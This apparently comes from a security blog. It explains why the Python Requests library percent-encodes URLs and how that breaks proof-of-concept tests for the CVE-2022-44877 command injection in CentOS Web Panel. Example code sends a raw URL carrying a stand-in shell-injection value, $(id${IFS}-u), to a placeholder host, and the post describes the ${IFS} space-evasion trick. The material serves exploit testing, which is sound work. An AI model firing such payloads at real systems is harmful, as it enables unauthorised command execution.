One Day Sec

Why does the Python Requests library encode URLs by default, and how does this cause issues when testing exploits like CVE-2022-44877?

Requests does not send the URL string you give it verbatim. When a request is prepared (`PreparedRequest.prepare_url`), the URL is parsed, reassembled and passed through `requests.utils.requote_uri`, which percent-encodes every character outside the RFC 3986 unreserved set and a short list of reserved characters it treats as safe (`!#$%&'()*+,/:;=?@[]~`). That is correct behaviour for an ordinary HTTP client, but it silently rewrites injection payloads. Proof-of-concept requests for CVE-2022-44877 (the command injection in the CentOS Web Panel 7 login page) carry shell metacharacters in a query parameter: `$`, `(` and `)` are in the safe set and survive, but `{` and `}`, which constructs such as `${IFS}` depend on, become `%7B` and `%7D`. The request that reaches the target no longer contains the characters the payload needs, so the exploit fails and the test reports the host as not vulnerable even when it is. The workaround, described in Python Development Tips - Disabling URL Encoding in the Requests Library, is to prepare the request normally, overwrite the prepared object's `url` attribute with the raw string, and hand it to `Session.send()`, which uses that attribute as-is.
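The following is an added example, not code from the page or from the Requests project, showing both halves of the problem: what `requote_uri` and normal request preparation do to a brace-bearing payload, and the prepare-then-overwrite pattern that sends it untouched. The host, path and parameter name are constructed placeholders, and `$(id${IFS}-u)` is only a stand-in illustrating why the braces matter, not a real exploit string.

```python
"""Show how Requests rewrites a URL during preparation, and how to send the
raw string an injection payload needs instead of the re-encoded one."""
import requests
from requests.utils import requote_uri

# Constructed example URL: a shell-metacharacter payload in a query
# parameter. ${IFS} stands in for a space, so `{` and `}` must survive.
# Host, path and parameter name are placeholders, not a real endpoint.
RAW_URL = "http://target.example/login/index.php?login=$(id${IFS}-u)"


def encoded_url(url: str) -> str:
    """What requote_uri alone does: characters outside its safe set
    ("!#$%&'()*+,/:;=?@[]~" plus unreserved) are percent-encoded,
    so `{` -> %7B and `}` -> %7D while `$`, `(` and `)` are left alone."""
    return requote_uri(url)


def prepare_default(method: str, url: str) -> requests.PreparedRequest:
    """Normal preparation. PreparedRequest.prepare_url() parses the URL,
    rebuilds it and runs requote_uri on the result, so the braces are
    encoded before the request is ever sent."""
    return requests.Request(method, url).prepare()


def prepare_raw(method: str, url: str) -> requests.PreparedRequest:
    """Prepare as usual (headers, hooks, body), then put the raw string
    back into .url. Session.send() does not re-prepare, and the adapter
    builds the request line from .path_url, which is derived from .url
    without further quoting."""
    prep = requests.Request(method, url).prepare()
    prep.url = url
    return prep


def send_raw(session: requests.Session, method: str, url: str, **kwargs):
    """Send a request whose URL is transmitted exactly as given.
    Extra kwargs (timeout, verify, proxies, ...) go to Session.send()."""
    return session.send(prepare_raw(method, url), **kwargs)


if __name__ == "__main__":
    print("requote_uri  :", encoded_url(RAW_URL))
    print("default .url :", prepare_default("GET", RAW_URL).url)
    print("raw .url     :", prepare_raw("GET", RAW_URL).url)
    print("raw path_url :", prepare_raw("GET", RAW_URL).path_url)
    # To actually fire it against a lab host you control:
    # send_raw(requests.Session(), "GET", RAW_URL, timeout=10)
```

The override only bypasses Requests' own quoting. Characters that are illegal in an HTTP request line, such as a literal space or CR/LF, are still rejected lower down by `http.client`, which is why command-injection payloads use `${IFS}` in place of spaces rather than relying on this trick alone.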
Tags: Python Requests, URL encoding, CVE-2022-44877, exploit testing, requote_uri
